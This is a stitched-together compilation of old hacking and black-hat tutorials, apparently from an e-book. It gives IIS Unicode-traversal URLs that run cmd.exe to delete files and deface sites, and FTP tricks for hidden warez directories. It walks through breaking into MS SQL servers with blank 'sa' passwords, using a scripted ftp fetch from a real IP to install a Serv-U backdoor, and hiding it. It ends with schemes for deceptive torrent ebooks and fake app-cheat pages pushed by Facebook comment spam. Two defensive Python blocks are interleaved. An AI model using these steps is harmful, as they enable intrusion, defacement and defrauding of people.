www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20del%20c:\whatever.file

To make a text file use:
www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20echo%20Your txt goes here!!!!!>%20test.txt

Changing the mainpage.htm

Now on to the important part, editing the website's main page. HTML is not needed, but if

you want an in any way decent-looking deface you need to know it. If you don't know it, don't worry: any text in a file with a .htm or .html extension will show up in a browser. If you want to learn HTML it can be done by anybody; I learned the basics in about 1 day. OK, enough girlie talk, to the point: you have to copy the file CMD.exe to the directory with the page in it. Let's call this page wannabie_admin.html and let's say the directory wannabie_admin.html is in is C:\home\site. So the COPY command:

www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20copy%20c:\winnt\system32\cmd.exe%20C:\home\site\CMD.exe

That will copy CMD.exe (like command.com in Win98) to d:\home\site. Now to paste the text we want into wannabie_admin.html:

www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/home/site/CMD.exe?/c%20echo%20Damn Wannabies! You run IIS and you just been cracked>%20wannabie_admin.html

Now your text should be on the main page. If you echo HTML code into wannabie_admin.html, you'll get a much better defacement. If you are going to do it, do it RIGHT!

Please, please listen to me, IIS servers >>>-LOG-<<< all the stuff! So use a >>>-PROXY-<<< or else pay the price!

Invisible Directories:

They are directories that don't get listed. A sample path of an invisible directory is:

/.tmp/ /folder1/

The 'space' isn't a name but a character, so it can't be listed, and the user won't see anything beyond the .tmp folder. The 'period' in front of tmp is to hide it from conventional FTP clients and somewhat from the site admin, because by default folders with a "." in front of them are considered to be hidden files and don't get listed. I found

that SmartFTP can 'see' these so-called invisible directories (/ /) by default. To create the above path, you have to enter the paths in FlashFXP exactly (replace <space> with the spacebar) in the following steps after hitting the Insert key to create dirs. You have to create the directory in step one first before you can create the directory in step two, and so on:

/.tmp/<space>/
/.tmp/<space>/<space>/
/.tmp/<space>/folder1/ <-- This is your working directory.

Inaccessible Directories:

These are directories that you can't enter even if you see them. You can simply type the following in this order to do this:

/folder1<space>/<space>/
/folder1<space>/folder2/ <-- This is your working directory.

You won't be able to get past /folder1 / unless you know the name of folder2. A safer method is to use the following "unusable names":

COM1, COM2, COM3, COM4 -- Windows COM ports
LPT1, LPT2, LPT3, LPT4 -- Windows printer ports

If you try to enter such a directory, you'll be returned an "incorrect function" error. A sample path of an inaccessible directory is:

/COM1 /folder1/

To create the above path, you have to enter the paths in FlashFXP exactly (replace <space> with the spacebar) in the following steps after hitting the Insert key to create dirs:

/COM1<space>/<space>/
/COM1<space>/folder1/ <-- This is your working directory.

Step-by-Step Sample Invisible/Inaccessible Dir:

Again, enter the following exactly as you see it, and replace the <space> with your spacebar and "folder1" and "folder2" with anything you want:

/<space>/<space>/
/<space>/COM1<space>/<space>/
/<space>/COM1<space>/<space>/<space>/
/<space>/COM1<space>/<space>/LPT1<space>/<space>/
/<space>/COM1<space>/<space>/LPT1<space>/yourname<space>/<space>/
/<space>/COM1<space>/<space>/LPT1<space>/folder1<space>/folder2/

Confusing?

Your working directory is the last line, or this:

/ /COM1 / /LPT1 /folder1 /folder2/

It is hidden through two (no name) folders and made inaccessible by one folder (folder1) and two "unusable names" (COM1, LPT1). Just want to say that the above examples assume that you're making dirs in the root. Most likely you'll encounter pubs that only allow read/write access to certain directories such as "/upload", "/pub", "/incoming", "/_vti_pvt" and others. In that case you'll have to add this to the path at the beginning. For example, if the working directory is "pub", then you'll have:

/pub/<space>/<space>/
/pub/COM1<space>/<space>/
/pub/COM1<space>/<space>/<space>/
-- and so on...

Be creative in creating directories!
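From the server operator's side, every trick in this section produces a directory name that Windows itself treats as special: whitespace-only, a trailing space, a leading period, or a reserved device name such as COM1 or LPT1. As an added example, not from the original text or from any FTP server, here is a Python audit that walks an FTP path and reports such segments, plus an allow-list check a server could apply to mkdir and rename requests; the reserved-name set goes beyond the page's COM1-4 / LPT1-4 to the full Windows list, the sample paths are the ones given above, and the function names are invented.

```python
# Names Windows reserves for devices: a path segment whose base name (the part
# before the first period) is one of these cannot be used as an ordinary
# directory. This is the full set, not only the COM1-4 / LPT1-4 the text lists.
RESERVED = ({"CON", "PRN", "AUX", "NUL"}
            | {f"COM{i}" for i in range(1, 10)}
            | {f"LPT{i}" for i in range(1, 10)})

# Sample paths taken from the text above, plus one ordinary path for contrast.
SAMPLE_PATHS = [
    "/.tmp/ /folder1/",                    # invisible directory
    "/COM1 /folder1/",                     # inaccessible directory
    "/ /COM1 / /LPT1 /folder1 /folder2/",  # the step-by-step sample
    "/pub/incoming/readme.txt",            # ordinary path
]


def audit_segment(name):
    """Return the list of problems with one directory or file name (empty if clean)."""
    if name.strip() == "":
        return ["whitespace-only name (not shown in listings)"]
    problems = []
    if name != name.rstrip(" ."):
        problems.append("trailing space or period")
    base = name.strip().split(".")[0].upper()
    if base in RESERVED:
        problems.append(f"reserved device name {base}")
    if name.startswith("."):
        problems.append("dot-prefixed name (hidden by many FTP clients)")
    return problems


def audit_path(path):
    """Walk a slash-separated FTP path; return (depth, segment, problems) for
    every segment that uses one of the hiding or blocking tricks."""
    findings = []
    for depth, seg in enumerate(path.split("/")):
        if seg == "":
            continue  # leading, trailing or doubled slash, not a name
        problems = audit_segment(seg)
        if problems:
            findings.append((depth, seg, problems))
    return findings


def allowed_name(name):
    """Server-side rule for MKD/RNTO requests: refuse any name the audit flags."""
    return name != "" and not audit_segment(name)


if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(repr(p), audit_path(p))
```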

This tutorial is written with the assumption that you already have hacking experience and know the basics, which will not be covered in this tutorial. This is the easiest way in my mind to hack SQL. I'm no expert, but I have tried a lot of different ways. Anyway, get hacking!

Tools You'll Need

SQL Exec [Here]
ServUDaemon or Winmgnt.exe [Serv-U Here or Winmgnt Here]
Anonymous or Personal FTP
Configured ServUDaemon.ini [Gotta get this yourself]
Other Useful Utilities Pack [Here]

Make a nice shortcut on your desktop to SQLExec; you're going to be using it quite a lot.

Open up SQLExec and it should look like this:

Now you are ready to use scans in this format:

[127.0.0.1 ]: Found Mssql account: sa/[NULL]

Enter in the info like so:


And Click the connect button. If the Server is up, and the user/pass is correct the connect button should turn grey.

You are now connected to the server. If you can't seem to connect, the server info has changed or it has been patched.

Moving on... The main commands for SQLExec are:

dir c:\
This will list the "c:\" drive's contents and show free space; change the drive letter accordingly.

md c:\recycler\_tmp
Will make any directory you tell it to; this command creates the folder "_tmp" in c:\recycler.

del c:\recycler\filename.exe
Will delete any file you tell it to.

copy c:\winnt\system32\tsksrv.exe c:\recycler\_tmp
This copies the file specified to any directory you wish. Great for hiding your Serv-U files after you have transferred them.

The commands above are the most commonly used. Now we are ready to hack some stro! Stop - make sure you have done everything so far, and have read carefully. You should be connected to the victim; enter "dir c:\" in the command box and press Enter. The person's c:\ drive listing should show up with free drive space:

This is the command set for getting your Serv-U files from the anonymous pub you set up earlier to the server. This tells the client to connect to IP 127.0.0.1 on port 21 and download Winmgnt.exe and ServUDaemon.ini from the root.

echo open 62.2.239.111 >> C:\3.txt
echo anonymous >> C:\3.txt
echo anonymous@dude.com >> C:\3.txt
echo BINARY >> C:\3.txt
echo get tsksrv.exe >> C:\3.txt
echo get ml_hconf.dll >> C:\3.txt
echo quit >> C:\3.txt
ftp -i -s:C:\3.txt

You enter these commands one by one; after entering the first one you should get a beep, or "SQL_NO_DATA". After you get either of these, move on to the next command. The last command, "ftp -i -s:C:\3.txt", will have the computer connect and download the files. SQLExec will "lock up" while it is downloading, then the screen will reappear when done and should show the following:

The default directory that the Serv-U files go to is "system32". On most stros it's c:\winnt\system32. So in our command box, type:

dir c:\winnt\system32\

That will list the system32 directory, like so:

Now that your files are on the computer it's time to hide them. In your command box type:

md c:\recycler\_tmp

That is where we will hide the files.

Now type:

copy c:\winnt\system32\tsksrv.exe c:\recycler\_tmp

and press Enter. Then type:

copy c:\winnt\system32\ml_hconf.dll.ini c:\recycler\_tmp

Now your files are well hidden from the sysop. You are now ready to start your server. Copy the IP to the clipboard, because you will need it. To start the server simply type:

c:\winnt\system32\tsksrv.exe

SQLExec should now lock up for good, and if everything went well you should be able to connect to your server on the port you set up. See Part 2.
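Seen from the database host, the sequence above (commands issued through the SQL service, a script file built line by line with echo, a scripted ftp -s: download, and files parked under \recycler\) is a short and distinctive process chain. As an added example, not from the original tutorial or from any tool it names, here is a Python detector over constructed process-creation events; it assumes the commands show up as child processes of sqlservr.exe, and the event format, the 192.0.2.50 address and the e-mail address are invented.

```python
import re
from collections import defaultdict

DB_SERVICE = "sqlservr.exe"                  # SQL Server service process
SHELLS = {"cmd.exe", "ftp.exe", "osql.exe"}  # children the service has no normal reason to spawn

# Rules: a command line appending to a file with "echo ... >> file", a scripted
# ftp run ("ftp -s:file"), and anything touching the \recycler\ folder.
ECHO_APPEND_RE = re.compile(r"\becho\b.*?>>\s*(?P<file>\S+)", re.IGNORECASE)
FTP_SCRIPT_RE = re.compile(r"\bftp(?:\.exe)?\b.*?-s:(?P<script>\S+)", re.IGNORECASE)
RECYCLER_RE = re.compile(r"\\recycler\\", re.IGNORECASE)


def spawn(parent, image, cmdline):
    """Build one constructed process-creation event (an invented, minimal shape)."""
    return {"parent": parent, "image": image, "cmdline": cmdline}


# The seven script lines follow the tutorial's sequence; the address and
# e-mail are invented.
FTP_SCRIPT_LINES = ["open 192.0.2.50", "anonymous", "anonymous@example.invalid",
                    "BINARY", "get tsksrv.exe", "get ml_hconf.dll", "quit"]

EVENTS = (
    [spawn("sqlservr.exe", "cmd.exe", f"cmd.exe /c echo {line} >> C:\\3.txt")
     for line in FTP_SCRIPT_LINES]
    + [
        spawn("sqlservr.exe", "cmd.exe", "cmd.exe /c ftp -i -s:C:\\3.txt"),
        spawn("cmd.exe", "ftp.exe", "ftp -i -s:C:\\3.txt"),
        spawn("sqlservr.exe", "cmd.exe", "cmd.exe /c md c:\\recycler\\_tmp"),
        spawn("sqlservr.exe", "cmd.exe",
              "cmd.exe /c copy c:\\winnt\\system32\\tsksrv.exe c:\\recycler\\_tmp"),
        spawn("sqlservr.exe", "cmd.exe", "cmd.exe /c c:\\winnt\\system32\\tsksrv.exe"),
        # Two benign events for contrast: an interactive shell, and the service starting.
        spawn("explorer.exe", "cmd.exe", "cmd.exe /c dir c:\\"),
        spawn("services.exe", "sqlservr.exe", "sqlservr.exe -sMSSQLSERVER"),
    ]
)


def analyse(events):
    """Return (event_index, image, reasons) for every event that trips a rule.
    Echo-append writes are remembered per file so that a later scripted ftp run
    can be tied back to the script it was fed."""
    alerts = []
    script_writers = defaultdict(int)  # script file -> number of echo-append writes
    for i, ev in enumerate(events):
        cmd = ev["cmdline"]
        reasons = []
        if ev["parent"].lower() == DB_SERVICE and ev["image"].lower() in SHELLS:
            reasons.append("shell spawned by database service")
        m = ECHO_APPEND_RE.search(cmd)
        if m:
            script_writers[m.group("file").lower()] += 1
        m = FTP_SCRIPT_RE.search(cmd)
        if m:
            script = m.group("script").lower()
            reasons.append("scripted ftp transfer")
            if script_writers[script]:
                reasons.append(f"ftp script {script} was built by "
                               f"{script_writers[script]} echo writes")
        if RECYCLER_RE.search(cmd):
            reasons.append("file staged or executed under \\recycler\\")
        if reasons:
            alerts.append((i, ev["image"], reasons))
    return alerts


def staging_chain_detected(events):
    """True once all three stages of the sequence above have been seen: a shell
    under the database service, a scripted ftp download, and a file placed
    under \\recycler\\."""
    seen = {reason for _, _, reasons in analyse(events) for reason in reasons}
    return {"shell spawned by database service",
            "scripted ftp transfer",
            "file staged or executed under \\recycler\\"} <= seen


if __name__ == "__main__":
    for index, image, reasons in analyse(EVENTS):
        print(index, image, reasons)
    print("chain detected:", staging_chain_detected(EVENTS))
```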


Other Things to Do After Your Server is Running

1. Getting your server to auto-start with the computer: Open up your site in FlashFXP. Get setit.exe from the Needed Utilities above, put it in the folder where your files are located, press "Control R" and enter "site exec setit.exe servername.exe". That will set your server to auto-start with the PC.

2. Securing the server from being rehacked: Open up your site in FlashFXP. Get "osql" here and put it in the MSSQL\binn folder, usually found in c:\ or c:\Program Files\Microsoft SQL Server\MSSQL\binn. Make sure osql.exe is in the "binn" folder, or this will not work!

Sometimes osql.exe is already on the server, and sometimes the sysops remove it, so it's good to have. Now you are going to change the server's password (the one you used to connect in SQLExec). Here are the commands you will use in FlashFXP:

For blank pass:
site exec osql.exe -U sa -P "" -Q "sp_password NULL,Logon,sa"

For sa pass:
site exec osql.exe -U sa -P "sa" -Q "sp_password sa,Logon,sa"

For password pass:
site exec osql.exe -U sa -P "password" -Q "sp_password password,Logon,sa"

For admin pass:
site exec osql.exe -U sa -P "admin" -Q "sp_password admin,Logon,sa"

That will change the logon to sa/Logon instead of sa/sa or sa/blank, securing it from being rehacked.

That's all folks! Happy h4x0ring!!

Closing Notes: I spent many hours on this tutorial. I know it's not perfect; I'm open to suggestions/comments. But please do not give this out without giving full credit to me (the author).

Not that anybody here would do that.

Want to make 800 a month doing nothing?

Well of course you would, why wouldn't you? It's easier than you thought, and this file has sure proven ways to make you rich quick. Don't waste your time with cheap affiliate programs and pyramid scams. It's a lot easier to just download a little plug-in! Just follow these easy steps:

1. Sign up at http://www.download4cash.tk
2. Advertise your site, make an e-book, and submit your site to search engines. (Hint: use peer-to-peer file sharing programs like Kazaa or WinMX.)
3. Sit back and collect your money!

I wish you the best of luck on your trip to becoming rich like me! Have fun! And good luck!

Guaranteed Money Making Guide - 100% workable

Hey guys, here's my first guide on BHW. Being in the info marketing business, I've come into contact with hundreds of different methods of making money online. Some WhiteHat (which I teach and sell), and some BlackHat... which honestly would hurt my reputation if I taught or sold them to my list. So here's where you guys stand to benefit. Hehe.

OK, so here's the basic mindset for this method. I've come to the conclusion that "pirates", however cheap as they come, are unable to get over one big manly flaw: SEX. And my tests have proven that pirates PAY with a higher consistency than the average online porn surfer. This translates into much higher conversion rates, with a much larger, somewhat untapped market. Here's basically what I did:

Step 1: Get (or ahem, purchase) dating guides (ebooks/videos/seminars) online. It's best to get guides that concentrate on "getting sex/dates online via dating sites". Scrape them and summarize them into an ebook less than 5 pages long. Too long an ebook will decrease conversion rates.

Step 2: Reword the ebook, mentioning the dating sites that seem to work best for your methods.

Add in 2 of your recommended dating sites' affiliate URLs at the beginning and end of the ebook (more about which dating site to choose at the bottom of this guide).

Step 3 (Crucial): Simply submitting the ebooks with titles like "How to get sex online" or "How to find horny women online" is going to get you banned. Torrent/P2P sites hate free stuff, and I'm sure the few of you who have tried this would know best. So to combat this, you want to change your title and description to something like this... "$3997 Underground Online Dating Guide - Only sold to 10 people", or any variation on this. Basically you want everyone to know that the ebook WASN'T FREE, and that it costs a bomb to get such an exclusive guide. Remember to make up a guru name like "Mr. Playboy".

Step 4: Start submitting the ebook to top torrent sites, P2P like LimeWire, rapidshare/megashare forums (this works very well) and finally private torrent sites (if you have access to them).

Step 5: Change or rearrange a few sentences or paragraphs in your ebook, then change the title to something different. The basic content and affiliate link remain the same. Repeat Step 4.

Step 6: Repeat Steps 5 and 4 every few days.

Step 7: Watch your affiliate stats grow exponentially.

Now I've tried a great number of adult dating sites, so here are two of my best performing STATS and results. Disclaimer: these are my stats from various testing which I don't track, so you should be able to get even higher conversion rates, which turns into higher per-signup $$$:

#1 - Iwantu
7 uniques per FREE signup ($7.10 per free signup)
71 uniques per PAID signup ($50 *35/week* to $100 *279/week* per paid signup)
By far my best performing dating site; choose the Pay per Profile for starters and once you see more and more traffic, start using the Pay per Signup campaign instead.

#2 - AdultFriendFinder

5 uniques per FREE signup ($0.35 per click)
55 uniques per PAID signup ($100 per paid signup)
My 2nd best performing affiliate site; only Pay Per Order is worth using. Now although AFF converts at a higher percentage than IWantU, the amount of traffic I get on IWantU is substantially higher, even when I placed the IWantU affiliate link AFTER AFF in my ebooks. I would assume that most downloaders of my ebooks already have a current account with AFF. Ultimately IWantU has much higher profits. Don't bother trying Rev/Percentage sharing; they have consistently only got me 1/4 to 1/3 the profits of per-signups. Not worth it.

This guide is pretty straightforward as you can see. Try to use a valid proxy while submitting your ebooks. I don't want to gloat about how much I've earned from using this method, but let me assure you that you shouldn't have any problems seeing 4 digits per day once you get the hang of this. I've now moved on to other methods, but being a human being, I still appreciate a thanks now and then and the ever so obvious webmaster referral commissions. If there are any questions or comments, just post here (the PM system doesn't really work on Firefox for me).

[METHOD] How To Make Money With Your Favourite App!

So as the title says, this is a method that I very recently found here. It sounded reasonably simple to execute, so I gave it a go, and as I expected - it worked. If you're looking to make thousands a day using this method, then I don't think that's going to be easy - but if you're just starting up and you're looking for a very simple and straightforward method, then this should be a perfect fit for you.

STEP 1

The original method involved using special events such as the Superbowl or the World Cup, but in my case I found the app niche to work out perfectly. What you're looking to do is find any popular app on the App Store or on Google Play. For example, for my initial test I picked the app 'Crossy Road'. For my second execution, I picked 'Tinder Plus'. What you're looking to do is pick something which you can provide 'cheats' or 'hacks' for. For example, for my first attempt, I picked 'Crossy Road' - a game where your character must cross each road by dodging the oncoming vehicles. I realised the game was more than frustrating once you got to a higher level, and so I wanted to provide people with the 'solution' to getting rid of their frustration. In this case, I offered users an 'invincibility glitch'. For the 'Tinder Plus'

Page 477


Power Of Hacking速 app, I offered to provide 'free access to Tinder's pro features'. STEP 2 So once you have found an app which you can give away something for (whether that's a cheat, hack, gold, gems, coins whatever), you want to register a quick domain for it. Doesn't really matter what you choose so long as its relevant to what you're offering. We're going to be monetising this site with mobile offers, but you can choose to monetise it any way you like (although mobile offers seem to work best when working with apps). Now the design of the site is completely up to you, but as you can imagine, the more 'convincing' it looks - the better your site will convert. I've seen some extremely basic sites out there that are working well, so don't stress out too much about the site. Just make sure you have a clear CTA and also ensure that your site looks fine on mobile. I would recommend using a responsive theme which basically takes care of everything for you. Here is an example of a pretty simple site I found (some as basic, and some looked pretty convincing - but like I said, it won't matter too much so long as your site isn't completely horrific).

I'm pretty sure you can make yours look much better than the above but I hope you get the idea. Just have a simple landing page, add a few images, add some content and instructions and then have a big enough link or CTA that stands out and screams 'click me!'. To monetise the site, like I said I used mobile offers and there are plenty of networks out there you can join. I used Ogmobi - but there are lots out there. The way it works is whenever someone installs and opens a free app, you get paid. Payouts are usually anywhere between $0.35 on the low side to around $0.85 on the higher end. This might not seem like much but unlike other offers where people need to fill out 10 minute surveys, this has a much higher conversion rate. After all, all it takes is for them to install an app and that never takes over a minute or 2. You don't have to actually 'provide the cheat' but if you want - you can always redirect the user to a video on Youtube with the cheat or something similar. Be creative here.

STEP 3

Now that you have actually created a site or a landing page - you need to promote it. Now you could choose to do forum spamming, SEO etc but here we do something different. I give full credit to the original poster of this method (link at the top of this thread) for this technique. We're going to use Facebook. Make sure you use a dummy account for this (you'll understand why in a bit) and it would be good if you could phone verify it. Once you're logged in, go ahead and search for a page related to the app you are promoting. In my case, I picked the official page for the game.

I would avoid pages with lower 'likes' as you probably won't reach a wide enough audience. Find one of the latest posts on the page, and comment something a little similar to:


Feel free to be creative with whatever you say. Just make sure you tell people what they can get, and make sure you mention the 'give this a thumbs up if it worked for you' statement. Now that you've posted it - it's probably gone to the bottom of the comments pile. We're going to use Likelikego to boost it.

STEP 4

When you're on Likelikego, click on 'get an access token' and then follow the instructions. There is a detailed explanation here. What you're basically doing is boosting your comment to the top of the comments list. Now make sure you're aware that on some pages it will be really hard to go to the top (especially if the top comments have 1000+ likes etc - which is why I recommend picking an app or game that is not too popular, but at the same time, has enough potential to bring in traffic). Once you've boosted your comment to the top, it should look something like:


You should find your comment at the top of the list. Now.. if you don't find your comment at the top, then I would recommend trying it again but without the link. It should work, and after around 15 minutes edit and add in your link to the site. One thing I have noticed from doing this is that Facebook can sometimes restrict your comments from going to the top even if you have the 'likes' and there's no way around this except from creating another account. To avoid this type of restriction, keep your posts looking natural and not spammy. Don't post comment after comment just to try and bang out quantity.

STEP 5

You can always go a step further and have another account reply to your first comment. You could say something like 'can't believe this actually worked - thanks!' and then send some likes to that comment too. Again, be creative. Repeat this step on different posts and pages you find related to your app - but like I said, keep everything natural as you don't want to get any restrictions. Take it too fast and you could also possibly be banned by the page admin from sharing links on that particular page (in which case you simply need another account).
There are also other sites you can use to increase your likes in the same way, such as this and this. More likes = better chance of ranking top of the comments pile. I've seen some people order likes from Fiverr but I see no reason why you'd need to do that when you can get hundreds of likes for free using sites like the above. Notice how I used a bit.ly link. This allows me to track the clicks and traffic. After doing the initial test on this method myself, I got a few of my VAs doing it for me. I've tried different apps and niches (remember, you don't have to just do apps. Like the original poster of this method, you could do sports events, phone unlocks, live streams, etc). Don't just stop after posting on a single page. Find other related pages and post there too. Build more accounts, post in different places and boost all the comments. Here are some of the stats on one of my campaigns (one of my newer ones):

You're probably wondering how many of those 447 people converted and went through with the mobile offer on my site? Take a look:


As you can see, around 200 of the 447 people went through by clicking the CTA to the mobile offer page - and then around 100 of those 200 people converted by installing a free app - and I was paid anywhere from $0.30 - $1 per conversion. Note that some offers pay higher than others depending on the country of the user, device, etc. Now if you're thinking 'whaaat.. only $58.30' then think again.. this is just from 1 site. For those who have the time to execute different campaigns for different apps, you could potentially make good money from this providing the users are converting on your site. Obviously a better designed landing page will convert more than a simple page with text blocks and text links. I'm not saying this method is a gold mine but if used correctly, it does work. And to be honest, the only investment you need is the money for the domain (everything else is all down to how much time you are willing to allocate working on this).
